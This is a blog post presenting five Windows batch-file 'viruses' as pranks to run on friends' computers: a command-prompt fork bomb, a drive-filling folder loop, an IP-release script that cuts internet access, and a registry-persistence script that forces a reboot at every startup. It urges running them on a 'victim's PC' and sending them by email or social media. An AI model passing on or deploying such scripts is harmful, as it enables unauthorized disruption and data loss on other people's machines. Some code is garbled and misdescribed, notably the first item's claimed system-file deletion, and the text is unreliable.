5 BEST, FUN VIRUSES TO PLAY TRICKS AROUND FRIENDS

| cyberbuddy.co.in | Cyber security

So you want to play tricks around your friends..
Here are some fun and notorious viruses that you can inject in your friend's PC and have fun.

1. HOW TO DELETE ALL YOUR SYSTEM FILES.


Copy the below code in notepad and save it with extension .bat (name.bat)

@echo off
:xnet
user %random% /add
goto x
| cyberbuddy.co.in | Cyber security


Run the following batch file into the victim's PC.
This batch file virus will delete the system files and hence the victim will be unable to boot in this/her PC and needs to reinstall the Operating System.

2. CRASH YOUR WINDOWS WITH NUMEROUS COMMAND PROMPT.


Copy the below code in notepad and save it with extension .bat (name.bat)

@echo off
:1
start
goto 1
| cyberbuddy.co.in | Cyber security



Run the following batch file into the victim's PC.
This batch file virus will open up many command propmts and will freeze your PC and you have to Restart it in order to get it fixed.



3. CREATE LOTS OF FOLDERS IN MINUTES.


Copy the below code in notepad and save it with extension .bat (name.bat)

@echo off
:1
cd /d C:
md %random%
cd /d D:
md %random%
cd /d E:
md %random%
goto 1
| cyberbuddy.co.in | Cyber security


Run the following batch file into the victim's PC.
This batch file virus will make many thousands of blank folder in your PC and it would be very difficult to delete them at a certain stage it will crash your PC due to insufficient space for the OS to run.

4. HOW TO CUT OFF SOMEONE'S INTERNET ACCESS


Copy the below code in notepad and save it with extension .bat (name.bat)

@echo off
ipconfig /release

| cyberbuddy.co.in | Cyber security

Run the following batch file into the victim's PC.
This batch file virus will vanish off your Internet Protocol (IP) address and will make the victim unable to connect to Internet.
This can be repaired by :

@echo off
ipconfig /renew


5.  SHUTDOWN PC EVERYTIME IT BOOTS UP.


Copy the below code in notepad and save it with extension .bat (name.bat)

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo SYSTEM SHUTDOWN
PAUSE
| cyberbuddy.co.in | Cyber security


Run the following batch file into the victim's PC.
This batch file virus will always shutdown your PC as soon as you switch it on.

Conclusion : All the above batch files should not be used in your own PC as it can cause you loss of data .
All the viruses can be sent using social media like whatsapp ,Facebook ,etc.
Attachment  of the files with E-mail is the best option you can opt for.

NOTE : The following content is for educational purpose. I am not responsible for any kind of wrong practises.
Reactions

Post a Comment

0 Comments